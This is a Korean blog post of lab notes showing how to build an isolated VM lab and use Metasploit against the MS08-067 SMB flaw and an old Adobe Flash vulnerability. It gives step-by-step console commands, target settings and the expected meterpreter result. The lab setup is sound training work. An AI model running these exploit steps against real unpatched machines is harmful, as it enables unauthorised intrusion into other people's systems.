소프트웨어 버그 헌팅 - 1
메타스플로잇 실습(MS08_067,어도브 취약점)
메타스플로잇 실습을 위한 환경 구축
kali : root / toor
칼리 설정 : 네트워크 -> 호스트 only, USB -> 1.1으로 변경
IP : 192.168.56.101
vm 설정 : 네트워크 -> 호스트 only(Host2에 설정)
저장소 -> 컨트롤러 IDE 새로추가(비움) -> 실행 후 ->게스트확장자 CD 삽입
메모리 조금 더 추가
방화벽 해제
IP : 192.168.56.103
win7 설정 : 네트워크 -> 호스트 only
저장소 -> 컨트롤러 IDE 새로추가(비움) -> 실행 후 ->게스트확장자 CD 삽입
방화벽 해제
IP : 192.168.56.102
칼리에서 CD/USR/share/metasploit-framework/modules/exploits 경로에는 각종 익스플로잇이 존재한다.
WIN xp로 실습할 예정이므로 Windows 경로에 들어가면 Windows 관련 익스플로잇이 존재한다.
def initialzize는 기본적인 정보를 알려준다. 실질적인 취약점 코드는 def exploit 이다.
ms08_067를 메타스플로잇으로 시연해볼 예정이다.
해당 취약점은 SMB 취약점으로써 SMB를 사용하고 있어야한다.
그러므로 VM환경에서 SMB를 활성화 해야한다.
>> msfconsole : 메타스플로잇 콘솔 실행
메타스플로잇 콘솔 실행한 후
>> search ms08-067
해당 명령어로 익스플로잇이 존재하는지 확인할 수 있으며 경로를 use 경로로 사용할 수 있다
>> use exploit/windows/smb/ms08_067_netapi 2008-10-28
>> info
해당 익스플로잇의 전반적인 정보를 알 수 있음
>>show options
해당 익스플로잇의 옵션 값에 대한 정보를 알 수 있음
>>set rhosts 192.168.56.103(vm)
rhosts 값을 192.168.56.103(VM ip)로 변경
>>exploit
설정된 값으로 공격 시행(run해도됨)
meterpreter 뜨면 제대로 성공한 것이다
Adobe 플래쉬을 메타스플로잇으로 공격해보자
'VM' 환경에 install flash player와 와이어 샤크를 설치한다.
install_flash_player_ax_10.3.183.10.exe
>>use exploit/windows/browser/adobe_flash_mp4_cprt
>>set srvhost 칼리 IP
>>set urlpath /
>> lhost 칼리 IP
>> run
Server Started가 뜬다.
VM으로 가서 와이어샤크를 실행해준다.
이제 VM에 가서 익스플로러를 실행하고 URL에 http://칼리IP:포트/URL 입력한다.
성공하면 와이어샤크에서 file -> Export Objects -> Http 에서 파일이 3개 있는 것을 알 수 있다.
그리고 익스플로러는 자동 종료될 것이다.
'Reversing' 카테고리의 다른 글
소프트웨어 버그 헌팅 - 2.1 (OllyDBG, IDA) (0) | 2019.12.07 |
---|---|
소프트웨어 버그 헌팅 - 2 (어셈블리 기초 및 실습) (0) | 2019.12.07 |
시스템 내에서 일어나는 여러 행위들을 기록하는 툴 Sysmon (1) | 2017.08.23 |
운영보안할 때 도와주는 툴 PC Hunter, SystemExplorer (0) | 2017.08.23 |
파일 시스템 활동을 모니터해주는 툴 Process Monitor (0) | 2017.08.23 |
최근댓글